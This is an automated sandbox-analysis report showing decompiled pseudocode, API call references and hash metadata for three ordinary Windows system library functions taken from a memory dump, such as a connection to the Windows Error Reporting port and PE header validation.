HEAP: , xrefs: 6AC1255C

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: Print$CompareMemory
String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
API String ID: 216965414-3815128232
Opcode ID: f41518cfa1207e54d3b0361ddf20c654fdd9f3853ef22db1173109996af579df
Instruction ID: bcddfdca38ed61c31404c5a74c4336634d9109274ca2f6fbf1ff31c74172c918
Opcode Fuzzy Hash: f41518cfa1207e54d3b0361ddf20c654fdd9f3853ef22db1173109996af579df
Instruction Fuzzy Hash: 0B51D43D3182509AE760CB1AC8E477277E1EB47348F5188E9E4D58B245FE29DC46FB60

Uniqueness

Uniqueness Score: -1.00%

Function 6ABF1570, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 137
nativeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E6ABF1570(intOrPtr __ecx, signed int __edx, void* __edi, void* __eflags) {
				signed int _v8;
				char _v36;
				void _v52;
				char _v56;
				char _v60;
				short _v64;
				char _v68;
				char _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				char _v100;
				int _v104;
				int _v108;
				int _v112;
				int _v116;
				int _v120;
				char _v124;
				void* _v132;
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t48;
				intOrPtr _t53;
				intOrPtr _t59;
				signed int _t61;
				signed int _t62;
				signed int* _t63;
				signed int* _t70;
				int _t73;
				signed int _t84;

				_t82 = __edi;
				_t81 = __edx;
				_v8 =  *0x6ac5d360 ^ _t84;
				_t73 = 0;
				_v76 = __edx;
				_v80 = __ecx;
				_v60 = 0;
				_v56 = 0;
				_v68 = 0;
				_v64 = 0x500;
				_t48 = E6ABF16FA();
				_t83 = _t48;
				if(_t48 < 0) {
					L19:
					if(_v60 != 0) {
						_push(_v60);
						E6ABA95D0();
					}
					return E6ABAB640(_t83, _t73, _v8 ^ _t84, _t81, _t82, _t83);
				}
				_push(0);
				_push(8);
				_push( &_v100);
				_push(0x73);
				_t53 = E6ABA9860();
				_t83 = _t53;
				if(_t53 < 0) {
					goto L19;
				}
				_t83 = E6ABF176C(_v100);
				if(_t83 < 0) {
					goto L19;
				}
				_t92 = _t83 - 0x102;
				if(_t83 == 0x102) {
					goto L19;
				}
				RtlInitUnicodeString( &_v132, L"\\WindowsErrorReportingServicePort");
				memset( &_v52, 0, 0x2c);
				_v36 = 0x568;
				_push( &_v56);
				_t59 = E6ABF1879(0,  &_v68, __edi, _t83, _t92);
				_t83 = _t59;
				if(_t59 >= 0) {
					_t61 = _v96;
					_v124 = 0x18;
					_v120 = 0;
					_v112 = 0;
					_v116 = 0;
					_v108 = 0;
					_v104 = 0;
					if(_t61 != 0xffffffff) {
						_t81 = _t61 * 0xffffd8f0 >> 0x20;
						_t62 = _t61 * 0xffffd8f0;
						__eflags = _t62;
						_v92 = _t62;
						_t63 =  &_v92;
						_v88 = _t61 * 0xffffd8f0 >> 0x20;
					} else {
						_t73 = 1;
						_t63 = 0;
					}
					_push(_t63);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(_v56);
					_push(0x20000);
					_push( &_v52);
					_push( &_v124);
					_push( &_v132);
					_push( &_v60);
					_t83 = E6ABA9C70();
					if(_t83 >= 0 && _t83 != 0x102) {
						_v72 = 0x568;
						if(_t73 == 0) {
							_t70 =  &_v92;
						} else {
							_t70 = 0;
						}
						_t73 = _v76;
						_push(_t70);
						_push(0);
						_push( &_v72);
						_push(_t73);
						_push(0);
						_push(_v80);
						_push(0x20000);
						_push(_v60);
						_t83 = E6ABA9DA0();
						if(_t83 >= 0 && _t83 != 0x102) {
							_t83 =  *((intOrPtr*)(_t73 + 0x1c));
							if( *((intOrPtr*)(_t73 + 0x1c)) >= 0) {
								_t83 = 0;
							}
						}
					}
				}
				if(_v56 != 0) {
					E6ABF1AD6(_v56);
				}
				goto L19;
			}

0x6abf1570
0x6abf1570
0x6abf1582
0x6abf1586
0x6abf1588
0x6abf158c
0x6abf158f
0x6abf1592
0x6abf1595
0x6abf1598
0x6abf159e
0x6abf15a3
0x6abf15a7
0x6abf16da
0x6abf16de
0x6abf16e0
0x6abf16e3
0x6abf16e3
0x6abf16f9
0x6abf16f9
0x6abf15ad
0x6abf15ae
0x6abf15b3
0x6abf15b4
0x6abf15b6
0x6abf15bb
0x6abf15bf
0x00000000
0x00000000
0x6abf15cd
0x6abf15d1
0x00000000
0x00000000
0x6abf15d7
0x6abf15dd
0x00000000
0x00000000
0x6abf15ec
0x6abf15f8
0x6abf1600
0x6abf160d
0x6abf1611
0x6abf1616
0x6abf161a
0x6abf1620
0x6abf1623
0x6abf162a
0x6abf162d
0x6abf1630
0x6abf1633
0x6abf1636
0x6abf163c
0x6abf1649
0x6abf1649
0x6abf1649
0x6abf164b
0x6abf164e
0x6abf1651
0x6abf163e
0x6abf163e
0x6abf1640
0x6abf1640
0x6abf1654
0x6abf1657
0x6abf1658
0x6abf1659
0x6abf165a
0x6abf165b
0x6abf1661
0x6abf1666
0x6abf166a
0x6abf166e
0x6abf1672
0x6abf1678
0x6abf167c
0x6abf1686
0x6abf168f
0x6abf1695
0x6abf1691
0x6abf1691
0x6abf1691
0x6abf1698
0x6abf169b
0x6abf169c
0x6abf16a1
0x6abf16a2
0x6abf16a3
0x6abf16a5
0x6abf16a8
0x6abf16ad
0x6abf16b5
0x6abf16b9
0x6abf16c3
0x6abf16c8
0x6abf16ca
0x6abf16ca
0x6abf16c8
0x6abf16b9
0x6abf167c
0x6abf16d0
0x6abf16d5
0x6abf16d5
0x00000000

APIs

Part of subcall function 6ABF16FA: ZwQueryWnfStateNameInformation.1105(6AB4FB74,00000001,00000000,00000568,00000004,?,?,00000000,?,?,?,?,6ABF15A3,?,00000568), ref: 6ABF1718
Part of subcall function 6ABF16FA: ZwUpdateWnfStateData.1105(6AB4FB74,00000000,00000000,00000000,00000000,00000000,00000000,6AB4FB74,00000001,00000000,00000568,00000004,?,?,00000000), ref: 6ABF172D
Part of subcall function 6ABF16FA: EtwEventWriteNoRegistration.1105(6AB4FB7C,?,00000000,00000000,6AB4FB74,00000001,00000000,00000568,00000004,?,?,00000000,?,?,?,?), ref: 6ABF174B

ZwQuerySystemInformation.1105(00000073,?,00000008,00000000,?,00000568), ref: 6ABF15B6

Part of subcall function 6ABA9860: LdrInitializeThunk.NTDLL(6ABF15BB,00000073,?,00000008,00000000,?,00000568), ref: 6ABA986A

Part of subcall function 6ABF176C: ZwOpenEvent.1105(00000568,00100001,?,?,00000000), ref: 6ABF17B5
Part of subcall function 6ABF176C: ZwWaitForSingleObject.1105(00000568,00000000,?,00000568,00100001,?,?,00000000), ref: 6ABF17E1
Part of subcall function 6ABF176C: ZwClose.1105(00000568,00000568,00000000,?,00000568,00100001,?,?,00000000), ref: 6ABF17EB

RtlInitUnicodeString.1105(?,\WindowsErrorReportingServicePort,00000073,?,00000008,00000000,?,00000568), ref: 6ABF15EC
memset.1105(?,00000000,0000002C,?,\WindowsErrorReportingServicePort,00000073,?,00000008,00000000,?,00000568), ref: 6ABF15F8
ZwAlpcConnectPort.1105(?,?,00000018,?,00020000,?,00000000,00000000,00000000,00000000,?), ref: 6ABF1673
ZwAlpcSendWaitReceivePort.1105(?,00020000,?,00000000,?,00000568,00000000,?,?,?,00000018,?,00020000,?,00000000,00000000), ref: 6ABF16B0
ZwClose.1105(00000000,?,00000568), ref: 6ABF16E3

Strings

\WindowsErrorReportingServicePort, xrefs: 6ABF15E3

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: AlpcCloseEventInformationPortQueryStateWait$ConnectDataInitInitializeNameObjectOpenReceiveRegistrationSendSingleStringSystemThunkUnicodeUpdateWritememset
String ID: \WindowsErrorReportingServicePort
API String ID: 360723211-589754893
Opcode ID: 59175628b2c21853a7e3d225eee1b9ec90546c369c63defc699932d7e8560cd7
Instruction ID: a0409749e9e64dc0525b395144a8caeff63a6b09349ebafc9ac564b8ddbece8a
Opcode Fuzzy Hash: 59175628b2c21853a7e3d225eee1b9ec90546c369c63defc699932d7e8560cd7
Instruction Fuzzy Hash: 734164B1D0165CABDB10CEA5DC84AEDBBB8EF04714F1D0929EA04A7141DB309D49EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6AB7DD80, Relevance: 12.3, APIs: 8, Instructions: 337
nativeCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E6AB7DD80(void* __ecx, signed int __edx) {
				intOrPtr _v8;
				signed char _v13;
				void* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				long _v40;
				signed char _v44;
				signed int _v48;
				signed int _v52;
				void* __ebp;
				signed int _t111;
				signed char _t117;
				void* _t119;
				void* _t121;
				signed int _t123;
				signed int _t132;
				intOrPtr _t141;
				signed char _t142;
				signed int _t145;
				signed int _t149;
				signed int _t150;
				signed char _t151;
				signed int* _t157;
				signed int _t162;
				signed int _t165;
				signed char _t168;
				signed int _t169;
				void* _t172;
				signed char _t176;
				char _t178;
				signed int _t186;
				signed int _t187;
				signed int _t188;
				signed int _t195;
				signed int _t199;
				void* _t201;
				signed int* _t203;
				signed int _t207;
				signed int* _t208;
				void* _t213;

				_t186 = __edx;
				_v8 =  *((intOrPtr*)(_t213 + 4));
				_t203 = __edx;
				_v24 = 0;
				_t195 = __ecx;
				_v32 = __edx;
				_v20 = __ecx;
				 *((intOrPtr*)(__edx + 4)) = 0;
				 *((intOrPtr*)(__edx + 8)) = 0;
				if( *0x6ac58474 != 3) {
					L16:
					_push(0);
					_push(0xc);
					_push( &_v52);
					_push(6);
					_push(_t195);
					_push(0xffffffff);
					if(E6ABA9730() < 0) {
						L66:
						_t165 = 0;
						_v20 = 0;
						L21:
						_t203[1] = _t165;
						if(_t165 == 0) {
							_t187 = _v24;
							L43:
							_t111 = _t187;
							L15:
							return _t111;
						}
						_v28 = 0;
						E6AB7E9C0(1, _t165, 0, 0,  &_v28);
						if(( *(_v28 + 0x5e) & 0x00000400) != 0) {
							L56:
							_t188 = _t186 | 0xffffffff;
							_t111 = _t188;
							_t203[3] = _t195 | _t188;
							 *_t203 = _t188;
							goto L15;
						}
						E6AB7E9C0(1, _v20, 0, 0,  &_v40);
						_t117 = _v20;
						_t195 = 0;
						_v13 = 1;
						_t168 = _t117;
						_v24 = _t168;
						_v32 = 0;
						_v36 = 0;
						if((_t117 & 0x00000003) != 0) {
							_v24 = _t168;
							_v13 =  !_t117 & 0x00000001;
						}
						_t119 = E6AB7E9C0(1, _t168, 0, 0,  &_v32);
						_t169 = _v32;
						if(_t169 == 0) {
							L72:
							if(_t119 < 0) {
								goto L74;
							}
							_t186 = _v32;
						} else {
							_t132 =  *(_t169 + 0x18) & 0x0000ffff;
							_t186 = 0x10b;
							if(_t132 != 0x10b) {
								_t186 = 0x20b;
								if(_t132 != 0x20b) {
									L74:
									_t121 = RtlImageDirectoryEntryToData(_v20, 1, 0xe,  &_v40);
									if(_t121 == 0 || ( *(_t121 + 0x10) & 0x00000001) == 0) {
										_t187 = 0;
										L42:
										_t203[3] = 0;
										 *_t203 = _t187;
										goto L43;
									} else {
										goto L56;
									}
								}
								_t186 = _v13;
								_t119 = E6AB62F47(_v24, _t186, 0xa,  &_v32, _t169,  &_v36);
								_t195 = _v36;
								goto L72;
							}
							if( *((intOrPtr*)(_t169 + 0x74)) <= 0xa) {
								goto L74;
							}
							_t195 =  *(_t169 + 0xc8);
							if(_t195 == 0) {
								goto L74;
							}
							_t186 =  *(_t169 + 0xcc);
							_v36 = _t186;
							if(_v13 == 0) {
								if(_t195 <  *((intOrPtr*)(_t169 + 0x54))) {
									goto L30;
								}
								_t195 = E6ABA3C00(_t169, _v24, _t195);
								if(_t195 == 0) {
									goto L74;
								}
								_t186 = _v36;
								L31:
								if(_t195 == 0 || _t186 == 0 || _t186 != 0x40 && _t186 !=  *_t195) {
									goto L74;
								} else {
									_t123 =  *(_v40 + 4) & 0x0000ffff;
									if(_t123 == 0x3a64 || _t123 == 0x14c) {
										if( *_t195 < 0x48) {
											goto L74;
										}
										_t186 =  *(_t195 + 0x40);
										if(_t186 == 0) {
											goto L74;
										}
										_t195 =  *(_t195 + 0x44);
										if(_t195 == 0) {
											goto L74;
										}
										_t172 = _v20;
										if(_t186 <  *((intOrPtr*)(_v28 + 0x54)) + _t172 || _t195 >  *((intOrPtr*)(_v28 + 0x50)) - _t186 + _t172 >> 2) {
											goto L56;
										} else {
											goto L42;
										}
									} else {
										goto L74;
									}
								}
							}
							L30:
							_t195 = _t195 + _v24;
						}
						goto L31;
					}
					_t165 = _v52;
					_v20 = _t165;
					if(_t165 == 0 || (_v44 & 0x00000003) != 0 || _t195 < _t165) {
						goto L66;
					} else {
						_t203[2] = _v48;
						goto L21;
					}
				}
				E6AB8FAD0(0x6ac58654);
				_t141 =  *0x6ac5b350; // 0x1
				if(_t141 == 1) {
					L13:
					_t142 = 0x11;
					asm("lock cmpxchg [esi], ecx");
					_t176 = 0x11;
					if(0x11 != 0x11) {
						if(1 == 0) {
							L6ABBDF30(0x11, _t186, 0xc0000264);
							L62:
							_t145 = _t176 & 0xfffffff0;
							_t186 =  *(_t145 + 4);
							if(_t186 != 0) {
								L64:
								asm("lock xadd [edx+0x10], eax");
								if((_t145 | 0xffffffff) - 1 > 0) {
									goto L14;
								}
								_v28 = 0xfffffff7;
								L50:
								_t199 = _v28;
								while(1) {
									_t149 = _t176 & 0x00000006;
									_v36 = _t149;
									if(_t149 != 2) {
										_t150 = _t199;
									} else {
										_t150 = _t199 + 4;
									}
									_t186 = _t176 + _t150;
									_t151 = _t176;
									asm("lock cmpxchg [edi], esi");
									_t199 = _v28;
									if(_t151 == _t176) {
										break;
									}
									_t176 = _t151;
								}
								_t195 = _v20;
								if(_v36 == 2) {
									_t186 = 0;
									E6ABA00C2(0x6ac58654, 0, 0);
								}
								goto L14;
							} else {
								goto L63;
							}
							do {
								L63:
								_t145 =  *_t145;
								_t186 =  *(_t145 + 4);
							} while (_t186 == 0);
							goto L64;
						}
						if(0 != 0) {
							L48:
							if((_t176 & 0x00000008) != 0) {
								goto L62;
							}
							_v28 = _t142 | 0xffffffff;
							goto L50;
						} else {
							goto L46;
						}
						while(1) {
							L46:
							_t75 = _t176 - 0x10; // 0x1
							asm("sbb edx, edx");
							_t186 =  ~((_t176 & 0xfffffff0) - 0x10) & _t75;
							_t142 = _t176;
							asm("lock cmpxchg [esi], edx");
							if(_t142 == _t176) {
								goto L14;
							}
							_t176 = _t142;
							if((_t142 & 0x00000002) == 0) {
								continue;
							}
							goto L48;
						}
					}
					L14:
					_t111 = _v24;
					if(_t111 == 0) {
						if( *0x6ac5b35c == 0) {
							goto L15;
						}
						_t203 = _v32;
						goto L16;
					}
					goto L15;
				}
				_t178 = 1;
				_t8 = _t141 - 1; // 0x0
				_t201 = _t8;
				if(_t201 < 1) {
					L12:
					_t195 = _v20;
					goto L13;
				}
				do {
					_t186 = _t178 + _t201 >> 1;
					_t157 = (_t186 << 4) + 0x6ac5b360;
					_t207 = _t157[1];
					if(_v20 < _t207) {
						if(_t186 == 0) {
							goto L12;
						}
						_t201 = _t186 - 1;
						goto L7;
					}
					if(_v20 < _t157[2] + _t207) {
						_t208 = _v32;
						 *_t208 =  *_t157;
						_t208[1] = _t157[1];
						_t208[2] = _t157[2];
						_t208[3] = _t157[3];
						_t186 =  *0x7ffe0330;
						asm("ror eax, cl");
						_t162 =  *_t208 ^ _t186;
						_v24 = _t162;
						 *_t208 = _t162;
						goto L12;
					}
					_t178 = _t186 + 1;
					L7:
				} while (_t201 >= _t178);
				goto L12;
			}

0x6ab7dd80
0x6ab7dd92
0x6ab7dda3
0x6ab7dda5
0x6ab7ddad
0x6ab7ddaf
0x6ab7ddb2
0x6ab7ddb5
0x6ab7ddbc
0x6ab7ddc3
0x6ab7de8b
0x6ab7de8b
0x6ab7de8d
0x6ab7de92
0x6ab7de93
0x6ab7de95
0x6ab7de96
0x6ab7de9f
0x6abcb5c2
0x6abcb5c2
0x6abcb5c4
0x6ab7decb
0x6ab7decb
0x6ab7ded0
0x6abcb645
0x6ab7e01e
0x6ab7e01e
0x6ab7de82
0x6ab7de8a
0x6ab7de8a
0x6ab7ded9
0x6ab7dee8
0x6ab7def9
0x6ab7e0b6
0x6ab7e0b6
0x6ab7e0bb
0x6ab7e0bd
0x6ab7e0c0
0x00000000
0x6ab7e0c0
0x6ab7df0d
0x6ab7df12
0x6ab7df15
0x6ab7df17
0x6ab7df1b
0x6ab7df1d
0x6ab7df20
0x6ab7df27
0x6ab7df2c
0x6ab7df35
0x6ab7df38
0x6ab7df38
0x6ab7df46
0x6ab7df4b
0x6ab7df50
0x6abcb611
0x6abcb613
0x00000000
0x00000000
0x6abcb615
0x6ab7df56
0x6ab7df56
0x6ab7df5a
0x6ab7df62
0x6abcb5ee
0x6abcb5f6
0x6abcb61d
0x6abcb629
0x6abcb630
0x6abcb63c
0x6ab7e019
0x6ab7e019
0x6ab7e01c
0x00000000
0x00000000
0x00000000
0x00000000
0x6abcb630
0x6abcb5f8
0x6abcb609
0x6abcb60e
0x00000000
0x6abcb60e
0x6ab7df6c
0x00000000
0x00000000
0x6ab7df72
0x6ab7df7a
0x00000000
0x00000000
0x6ab7df84
0x6ab7df8a
0x6ab7df8d
0x6abcb5cf
0x00000000
0x00000000
0x6abcb5e0
0x6abcb5e4
0x00000000
0x00000000
0x6abcb5e6
0x6ab7df96
0x6ab7df98
0x00000000
0x6ab7dfb3
0x6ab7dfbb
0x6ab7dfc2
0x6ab7dfd5
0x00000000
0x00000000
0x6ab7dfdb
0x6ab7dfe0
0x00000000
0x00000000
0x6ab7dfe6
0x6ab7dfeb
0x00000000
0x00000000
0x6ab7dff4
0x6ab7dffe
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ab7dfc2
0x6ab7df98
0x6ab7df93
0x6ab7df93
0x6ab7df93
0x00000000
0x6ab7df50
0x6ab7dea5
0x6ab7dea8
0x6ab7dead
0x00000000
0x6ab7dec5
0x6ab7dec8
0x00000000
0x6ab7dec8
0x6ab7dead
0x6ab7ddce
0x6ab7ddd3
0x6ab7dddb
0x6ab7de5c
0x6ab7de63
0x6ab7de68
0x6ab7de6c
0x6ab7de71
0x6ab7e028
0x6abcb58b
0x6abcb590
0x6abcb592
0x6abcb595
0x6abcb59a
0x6abcb5a5
0x6abcb5a8
0x6abcb5b0
0x00000000
0x00000000
0x6abcb5b6
0x6ab7e067
0x6ab7e067
0x6ab7e070
0x6ab7e072
0x6ab7e075
0x6ab7e07b
0x6ab7e0dc
0x6ab7e07d
0x6ab7e07d
0x6ab7e07d
0x6ab7e080
0x6ab7e08a
0x6ab7e08c
0x6ab7e090
0x6ab7e095
0x00000000
0x00000000
0x6ab7e0e0
0x6ab7e0e0
0x6ab7e09b
0x6ab7e09e
0x6ab7e0a5
0x6ab7e0ac
0x6ab7e0ac
0x00000000
0x00000000
0x00000000
0x00000000
0x6abcb59c
0x6abcb59c
0x6abcb59c
0x6abcb59e
0x6abcb5a1
0x00000000
0x6abcb59c
0x6ab7e031
0x6ab7e058
0x6ab7e05b
0x00000000
0x00000000
0x6ab7e064
0x00000000
0x00000000
0x00000000
0x00000000
0x6ab7e033
0x6ab7e033
0x6ab7e035
0x6ab7e040
0x6ab7e042
0x6ab7e044
0x6ab7e046
0x6ab7e04c
0x00000000
0x00000000
0x6ab7e052
0x6ab7e056
0x00000000
0x00000000
0x00000000
0x6ab7e056
0x6ab7e033
0x6ab7de77
0x6ab7de77
0x6ab7de7c
0x6ab7e0ce
0x00000000
0x00000000
0x6ab7e0d4
0x00000000
0x6ab7e0d4
0x00000000
0x6ab7de7c
0x6ab7dddd
0x6ab7dde2
0x6ab7dde2
0x6ab7dde7
0x6ab7de59
0x6ab7de59
0x00000000
0x6ab7de59
0x6ab7ddf0
0x6ab7ddf3
0x6ab7ddfa
0x6ab7ddff
0x6ab7de05
0x6ab7de1c
0x00000000
0x00000000
0x6ab7de1e
0x00000000
0x6ab7de1e
0x6ab7de0f
0x6ab7de25
0x6ab7de28
0x6ab7de2d
0x6ab7de33
0x6ab7de3e
0x6ab7de41
0x6ab7de50
0x6ab7de52
0x6ab7de54
0x6ab7de57
0x00000000
0x6ab7de57
0x6ab7de11
0x6ab7de14
0x6ab7de14
0x00000000

APIs

RtlAcquireSRWLockShared.1105(6AC58654,00000000,00000000), ref: 6AB7DDCE
ZwQueryVirtualMemory.1105(000000FF,?,00000006,?,0000000C,00000000,00000000,00000000), ref: 6AB7DE98
RtlImageNtHeaderEx.1105(00000001,?,00000000,00000000,?,000000FF,?,00000006,?,0000000C,00000000,00000000,00000000), ref: 6AB7DEE8
RtlImageNtHeaderEx.1105(00000001,?,00000000,00000000,?,00000001,?,00000000,00000000,?,000000FF,?,00000006,?,0000000C,00000000), ref: 6AB7DF0D
RtlImageNtHeaderEx.1105(00000001,?,00000000,00000000,00000000,00000001,?,00000000,00000000,?,00000001,?,00000000,00000000,?,000000FF), ref: 6AB7DF46

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: HeaderImage$AcquireLockMemoryQuerySharedVirtual
String ID:
API String ID: 114269737-0
Opcode ID: 6204d16c5dc407ae4a3988f62c6545f2eafe88540dd119242bdbfda73a4dfeb4
Instruction ID: d00c3cf495e761b2db8580968c7c35f853e79294ac05280b92b3b7e264f6258d
Opcode Fuzzy Hash: 6204d16c5dc407ae4a3988f62c6545f2eafe88540dd119242bdbfda73a4dfeb4
Instruction Fuzzy Hash: 03C1D370A002869FDB24CF58C850BAEB7F2EF85314F15856DE475AB281EFB0E941DB91

Uniqueness

Uniqueness Score: -1.00%

Function 6AB6C600, Relevance: 12.2, APIs: 8, Instructions: 225
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E6AB6C600(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				char _v1036;
				intOrPtr _v1040;
				char _v1048;
				intOrPtr _v1052;
				short _v1054;
				void* _v1056;
				void* _v1060;
				long* _v1064;
				char _v1068;
				long _v1076;
				intOrPtr _v1080;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t70;
				void* _t74;
				intOrPtr _t77;
				void* _t78;
				intOrPtr* _t81;
				void* _t101;
				void* _t102;
				void* _t107;
				intOrPtr _t109;
				long* _t110;
				long* _t111;
				long* _t112;
				long* _t113;
				intOrPtr _t114;
				intOrPtr _t116;
				void* _t117;
				intOrPtr _t118;
				void* _t120;
				long _t121;
				long _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x6ac5d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E6AB76D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E6ABAB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t14 = _t70 + 0xc; // 0x38
					_t121 = _t14;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t74 = RtlAllocateHeap(_t107,  *0x6ac57b9c + 0x180000, _t121);
					_v1060 = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1068);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1056);
					_push(_t116);
					_t122 = E6ABA9650();
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *((intOrPtr*)(_t102 + 4));
							if(_t109 == 3 || _t109 == 7) {
								if(_t114 != _t109) {
									goto L59;
								}
								_t110 = _v1064;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1068 = _t118;
								if(_t110 == 0 ||  *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								} else {
									_push( *((intOrPtr*)(_t102 + 8)));
									_t59 = _t102 + 0xc; // 0xc
									_push(_t110);
									goto L54;
								}
							} else {
								_t118 = 4;
								if(_t109 != _t118) {
									if(_t109 != 0xb) {
										if(_t109 == 1) {
											if(_t114 != _t118) {
												_t118 =  *((intOrPtr*)(_t102 + 8));
												_v1068 = _t118;
												if(_t118 > _t77) {
													L10:
													_t122 = 0x80000005;
													L11:
													_t81 = _v1048;
													if(_t81 != 0 && (_t122 >= 0 || _t122 == 0x80000005)) {
														 *_t81 = _t118;
													}
													L15:
													_t78 = _v1060;
													if(_t78 != 0) {
														RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t78);
													}
													_t68 = _t122;
													goto L4;
												}
												_push(_t118);
												_t56 = _t102 + 0xc; // 0xc
												_push(_v1064);
												L54:
												memcpy();
												_t125 = _t125 + 0xc;
												goto L11;
											}
											if(_t77 != _t118) {
												L34:
												_t122 = 0xc0000004;
												goto L15;
											}
											_t111 = _v1064;
											if((_t111 & 0x00000003) == 0) {
												_v1068 = _t118;
												if(_t111 == 0) {
													goto L10;
												}
												_t42 = _t102 + 0xc; // 0xc
												_v1052 = _t42;
												_v1056 =  *((intOrPtr*)(_t102 + 8));
												_v1054 =  *((intOrPtr*)(_t102 + 8));
												_t122 = RtlUnicodeStringToInteger( &_v1056, 0, _t111);
												L44:
												_t118 = _v1080;
												goto L11;
											}
											_t122 = 0x80000002;
											goto L15;
										}
										_t122 = 0xc0000024;
										goto L44;
									}
									if(_t114 != _t109) {
										L59:
										_t122 = 0xc0000024;
										goto L15;
									}
									_t118 = 8;
									if(_t77 != _t118 ||  *((intOrPtr*)(_t102 + 8)) != _t118) {
										goto L34;
									} else {
										_t112 = _v1064;
										_v1068 = _t118;
										if(_t112 == 0) {
											goto L10;
										}
										 *_t112 =  *(_t102 + 0xc);
										_t112[1] =  *(_t102 + 0x10);
										goto L11;
									}
								}
								if(_t114 != _t118) {
									goto L59;
								}
								if(_t77 != _t118 ||  *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								} else {
									_t113 = _v1064;
									_v1068 = _t118;
									if(_t113 == 0) {
										goto L10;
									}
									 *_t113 =  *(_t102 + 0xc);
									goto L11;
								}
							}
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						if(_t118 <= _a20) {
							_t114 =  *((intOrPtr*)(_t102 + 4));
							_t77 = _t118;
							goto L26;
						}
						_v1068 = _t118;
						goto L10;
					}
					if(_t122 != 0x80000005) {
						goto L15;
					}
					RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1076;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E6ABA9650();
				if(_t122 >= 0) {
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x6ab6c608
0x6ab6c615
0x6ab6c625
0x6ab6c62d
0x6ab6c635
0x6ab6c640
0x6ab6c680
0x6ab6c687
0x6ab6c688
0x6ab6c689
0x6ab6c694
0x6ab6c694
0x6ab6c642
0x6ab6c64a
0x6ab6c697
0x6ab6c697
0x6abd7a25
0x6abd7a2b
0x6abd7a30
0x6abd7bea
0x6abd7bea
0x00000000
0x6abd7bea
0x6abd7a43
0x6abd7a48
0x6abd7a4e
0x00000000
0x00000000
0x6abd7a58
0x6abd7a5a
0x6abd7a5b
0x6abd7a5c
0x6abd7a5d
0x6abd7a63
0x6abd7a64
0x6abd7a6a
0x6abd7a6e
0x6abd79cb
0x6abd79cb
0x6abd79d0
0x6abd7a98
0x6abd7a9b
0x6abd7a9b
0x6abd7aa1
0x6abd7bc0
0x00000000
0x00000000
0x6abd7bc2
0x6abd7bc6
0x6abd7bc9
0x6abd7bcf
0x00000000
0x6abd7bde
0x6abd7ba9
0x6abd7bac
0x6abd7bb0
0x00000000
0x6abd7bb0
0x6abd7ab0
0x6abd7ab2
0x6abd7ab5
0x6abd7aef
0x6abd7b28
0x6abd7b64
0x6abd7b8f
0x6abd7b92
0x6abd7b98
0x6abd79e6
0x6abd79e6
0x6abd79eb
0x6abd79eb
0x6abd79f1
0x6abd79ff
0x6abd79ff
0x6abd7a01
0x6abd7a01
0x6abd7a07
0x6abd7a15
0x6abd7a15
